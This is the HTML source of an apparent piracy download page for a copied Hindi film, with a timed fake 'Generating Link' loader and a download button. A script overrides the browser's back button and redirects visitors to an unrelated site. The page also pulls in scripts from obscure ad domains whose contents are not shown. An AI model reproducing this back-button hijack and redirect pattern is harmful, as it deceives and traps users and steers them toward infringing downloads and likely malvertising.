
<html>
    <head>
<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex,nofollow">
<meta name="referrer" content="no-referrer" />
<meta name="referrer" content="none" />
<link rel="stylesheet" href="/Homepage/main.6a3e7a202fc6115ffcc0.css">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Download Link Generated</title>
<link rel='stylesheet' href='/css/dl.min.css'>
<link rel='stylesheet' href='/css/dlstyle.css'>
<style>
html,body {
    max-width:100%;
    overflow-x:hidden;
}
@font-face {
    font-family: 'Trebuchet MS';
    src: url('/css/trebuc.woff') format('woff'),
         url('/css/trebuc.ttf') format('truetype');
}

body {
    font-family: 'Trebuchet MS', sans-serif; /* Force Trebuchet */
}
            li, ul{
                list-style-type:none;
            }
            .hidden{
                display: none;
            }
.loading {
  align-items: center;
  justify-content: center;
}
.loader {
  max-width: 10rem;
  height: auto;
  stroke-linecap: round;
}
circle {
  fill: none;
  stroke-width: 3.5;
  -webkit-animation-name: preloader;
          animation-name: preloader;
  -webkit-animation-duration: 3s;
          animation-duration: 3s;
  -webkit-animation-iteration-count: infinite;
          animation-iteration-count: infinite;
  -webkit-animation-timing-function: ease-in-out;
          animation-timing-function: ease-in-out;
  -webkit-transform-origin: 170px 170px;
          transform-origin: 170px 170px;
  will-change: transform;
}
circle:nth-of-type(1) {
  stroke-dasharray: 550px;
}
circle:nth-of-type(2) {
  stroke-dasharray: 500px;
}
circle:nth-of-type(3) {
  stroke-dasharray: 450px;
}
circle:nth-of-type(4) {
  stroke-dasharray: 300px;
}
circle:nth-of-type(1) {
  -webkit-animation-delay: -0.15s;
          animation-delay: -0.15s;
}
circle:nth-of-type(2) {
  -webkit-animation-delay: -0.3s;
          animation-delay: -0.3s;
}
circle:nth-of-type(3) {
  -webkit-animation-delay: -0.45s;
          animation-delay: -0.45s;
}
circle:nth-of-type(4) {
  -webkit-animation-delay: -0.6s;
          animation-delay: -0.6s;
}
@-webkit-keyframes preloader {
  50% {
    -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
  }
}
@keyframes preloader {
  50% {
    -webkit-transform: rotate(360deg);
            transform: rotate(360deg);
  }
}
.py-6 {
    padding-bottom: 0rem !important;
    padding-top: 0rem !important;
    width: 15rem !important;
}
.text-gray-600 {
    color: rgb(75 85 99 / var(--tw-text-opacity)) !important;
}
.inline-svg {
    vertical-align: middle; /* Aligns the SVG with the text */
    display: inline-block; /* Keeps SVG inline with the text */
}
</style>
    </head>
    <body class="font-sans bg-white">
<main class="min-h-screen flex flex-col" >
<header class="container mx-auto px-4 py-4 lg:text-center lg:flex lg:items-center lg:justify-between">

<div class="flex justify-between px-0">
    <a href="/" class="flex justify-center items-center text-gray-600 text-3xl capitalize">
        <svg xmlns="http://www.w3.org/2000/svg" height="30" width="30" viewBox="0 0 512 512">
            <path d="M64 32C28.7 32 0 60.7 0 96l0 64c0 35.3 28.7 64 64 64l384 0c35.3 0 64-28.7 64-64l0-64c0-35.3-28.7-64-64-64L64 32zm280 72a24 24 0 1 1 0 48 24 24 0 1 1 0-48zm48 24a24 24 0 1 1 48 0 24 24 0 1 1 -48 0zM64 288c-35.3 0-64 28.7-64 64l0 64c0 35.3 28.7 64 64 64l384 0c35.3 0 64-28.7 64-64l0-64c0-35.3-28.7-64-64-64L64 288zm280 72a24 24 0 1 1 0 48 24 24 0 1 1 0-48zm56 24a24 24 0 1 1 48 0 24 24 0 1 1 -48 0z"/>
        </svg>
        
    </a>
</div>

</header>
<main class="flex-1 container mx-auto text-center max-w-3xl px-2 sm:px-0" id="download_container">
<div class="container main">
    <center>
<script>
document.addEventListener("DOMContentLoaded", function() {
history.pushState(null, null, location.href);
window.onpopstate = function () {
history.go(1);
window.location.href = 'https://so-gr3at3.com/go/1272663';
};
});
</script>
        <br> <br>
        <div class="loading">
            <svg class="loader" xmlns="http://www.w3.org/2000/svg" style="margin:auto;background:#fff;display:block;" width="200px" height="200px" preserveAspectRatio="xMidYMid" viewBox="0 0 340 340">
                <circle cx="170" cy="170" r="160" stroke="rgb(99, 102, 241)"/>
                <circle cx="170" cy="170" r="135" stroke="#404041"/>
                <circle cx="170" cy="170" r="110" stroke="rgb(99, 102, 241)"/>
                <circle cx="170" cy="170" r="85" stroke="#404041"/>
            </svg><br><br>
            <h3>Generating Link</h3><br><svg xmlns="http://www.w3.org/2000/svg" height="30" width="30" viewBox="0 0 512 512" class='inline-svg'><path d="M464 6.1c9.5-8.5 24-8.1 33 .9l8 8c9 9 9.4 23.5 .9 33l-85.8 95.9c-2.6 2.9-4.1 6.7-4.1 10.7l0 21.4c0 8.8-7.2 16-16 16l-15.8 0c-4.6 0-8.9 1.9-11.9 5.3L100.7 500.9C94.3 508 85.3 512 75.8 512c-8.8 0-17.3-3.5-23.5-9.8L9.7 459.7C3.5 453.4 0 445 0 436.2c0-9.5 4-18.5 11.1-24.8l111.6-99.8c3.4-3 5.3-7.4 5.3-11.9l0-27.6c0-8.8 7.2-16 16-16l34.6 0c3.9 0 7.7-1.5 10.7-4.1L464 6.1zM432 288c3.6 0 6.7 2.4 7.7 5.8l14.8 51.7 51.7 14.8c3.4 1 5.8 4.1 5.8 7.7s-2.4 6.7-5.8 7.7l-51.7 14.8-14.8 51.7c-1 3.4-4.1 5.8-7.7 5.8s-6.7-2.4-7.7-5.8l-14.8-51.7-51.7-14.8c-3.4-1-5.8-4.1-5.8-7.7s2.4-6.7 5.8-7.7l51.7-14.8 14.8-51.7c1-3.4 4.1-5.8 7.7-5.8zM87.7 69.8l14.8 51.7 51.7 14.8c3.4 1 5.8 4.1 5.8 7.7s-2.4 6.7-5.8 7.7l-51.7 14.8L87.7 218.2c-1 3.4-4.1 5.8-7.7 5.8s-6.7-2.4-7.7-5.8L57.5 166.5 5.8 151.7c-3.4-1-5.8-4.1-5.8-7.7s2.4-6.7 5.8-7.7l51.7-14.8L72.3 69.8c1-3.4 4.1-5.8 7.7-5.8s6.7 2.4 7.7 5.8zM208 0c3.7 0 6.9 2.5 7.8 6.1l6.8 27.3 27.3 6.8c3.6 .9 6.1 4.1 6.1 7.8s-2.5 6.9-6.1 7.8l-27.3 6.8-6.8 27.3c-.9 3.6-4.1 6.1-7.8 6.1s-6.9-2.5-7.8-6.1l-6.8-27.3-27.3-6.8c-3.6-.9-6.1-4.1-6.1-7.8s2.5-6.9 6.1-7.8l27.3-6.8 6.8-27.3c.9-3.6 4.1-6.1 7.8-6.1z"/></svg>&nbsp;&nbsp;&nbsp;&nbsp;<svg xmlns="http://www.w3.org/2000/svg" height="32" width="40" viewBox="0 0 640 512" class='inline-svg'><path d="M352 124.5l-51.9-13c-6.5-1.6-11.3-7.1-12-13.8s2.8-13.1 8.7-16.1l40.8-20.4L294.4 28.8c-5.5-4.1-7.8-11.3-5.6-17.9S297.1 0 304 0L416 0l32 0 16 0c30.2 0 58.7 14.2 76.8 38.4l57.6 76.8c6.2 8.3 9.6 18.4 9.6 28.8c0 26.5-21.5 48-48 48l-21.5 0c-17 0-33.3-6.7-45.3-18.7L480 160l-32 0 0 21.5c0 24.8 12.8 47.9 33.8 61.1l106.6 66.6c32.1 20.1 51.6 55.2 51.6 93.1C640 462.9 590.9 512 530.2 512L496 512l-64 0L32.3 512c-3.3 0-6.6-.4-9.6-1.4C13.5 507.8 6 501 2.4 492.1C1 488.7 .2 485.2 0 481.4c-.2-3.7 .3-7.3 1.3-10.7c2.8-9.2 9.6-16.7 18.6-20.4c3-1.2 6.2-2 9.5-2.2L433.3 412c8.3-.7 14.7-7.7 14.7-16.1c0-4.3-1.7-8.4-4.7-11.4l-44.4-44.4c-30-30-46.9-70.7-46.9-113.1l0-45.5 0-57zM512 72.3c0-.1 0-.2 0-.3s0-.2 0-.3l0 .6zm-1.3 7.4L464.3 68.1c-.2 1.3-.3 2.6-.3 3.9c0 13.3 10.7 24 24 24c10.6 0 19.5-6.8 22.7-16.3zM130.9 116.5c16.3-14.5 40.4-16.2 58.5-4.1l130.6 87 0 27.5c0 32.8 8.4 64.8 24 93l-232 0c-6.7 0-12.7-4.2-15-10.4s-.5-13.3 4.6-17.7L171 232.3 18.4 255.8c-7 1.1-13.9-2.6-16.9-9s-1.5-14.1 3.8-18.8L130.9 116.5z"/></svg>
            <noscript>Please Enable Javascript in Your Browser</noscript>
        </div>
    </center>
    <center>
        <div class="vd hidden">
            <h2>
                <svg xmlns="http://www.w3.org/2000/svg" height="24" width="30" viewBox="0 0 640 512" class='inline-svg'><path d="M579.8 267.7c56.5-56.5 56.5-148 0-204.5c-50-50-128.8-56.5-186.3-15.4l-1.6 1.1c-14.4 10.3-17.7 30.3-7.4 44.6s30.3 17.7 44.6 7.4l1.6-1.1c32.1-22.9 76-19.3 103.8 8.6c31.5 31.5 31.5 82.5 0 114L422.3 334.8c-31.5 31.5-82.5 31.5-114 0c-27.9-27.9-31.5-71.8-8.6-103.8l1.1-1.6c10.3-14.4 6.9-34.4-7.4-44.6s-34.4-6.9-44.6 7.4l-1.1 1.6C206.5 251.2 213 330 263 380c56.5 56.5 148 56.5 204.5 0L579.8 267.7zM60.2 244.3c-56.5 56.5-56.5 148 0 204.5c50 50 128.8 56.5 186.3 15.4l1.6-1.1c14.4-10.3 17.7-30.3 7.4-44.6s-30.3-17.7-44.6-7.4l-1.6 1.1c-32.1 22.9-76 19.3-103.8-8.6C74 372 74 321 105.5 289.5L217.7 177.2c31.5-31.5 82.5-31.5 114 0c27.9 27.9 31.5 71.8 8.6 103.9l-1.1 1.6c-10.3 14.4-6.9 34.4 7.4 44.6s34.4 6.9 44.6-7.4l1.1-1.6C433.5 260.8 427 182 377 132c-56.5-56.5-148-56.5-204.5 0L60.2 244.3z"/></svg> Link Generated !
            </h2>
            <br><br>
            <section class="py-6">
                <img src="/Homepage/upload.svg" class="mx-auto w-auto" />
            </section> <br><br>
            <a id="vd" href='https://pub-ae4961d7376541d7ac8c9c9f32eed981.r2.dev/Dhoom.Dhaam.2025.720p.Hindi.WEB-DL.5.1.ESub.x264-HDHub4u.Tv.mkv' cf-cache="" cf_t= "1397264835">
                <button id='downloadbtn' class='btn btn-brand-02' style='font-size: 18px;'>
                    <svg xmlns='http://www.w3.org/2000/svg' width='24' height='24' viewBox='0 0 24 24' fill='none' stroke='currentColor' stroke-width='2' stroke-linecap='round' stroke-linejoin='round' class='feather feather-download inline-svg'>
                        <path d='M21 15v4a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-4'></path>
                        <polyline points='7 10 12 15 17 10'></polyline>
                        <line x1='12' y1='15' x2='12' y2='3'></line>
                    </svg>
                    <span class='tx-bold'>Download Here</span>
                </button>
            </a>
            
    <br><hr>
       
                <hr>
        </div>
    </center>
    
    <script>
        setTimeout(function(){
            document.querySelector(".loading").classList.add("hidden");
            document.querySelector(".vd").classList.remove("hidden");
        }, 3000);  
    </script>
</div>
</main>
<footer class="bg-no-repeat bg-cover h-60 w-full flex justify-center items-end" style="background-image: url('/Homepage/wave.svg');" >
</footer>
</main>
</body>
<script src="/Homepage/main.6a3e7a202fc6115ffcc0.js"></script>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-PPKEGMM8NJ"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-PPKEGMM8NJ');
</script>
<script type='text/javascript' src='//strainviscountbestial.com/28/a0/aa/28a0aa228637c5b9ede06eaaec149074.js'></script>
<script data-cfasync="false" src="//d2uu46itxfd65q.cloudfront.net/?tiuud=1079877"></script>
</html>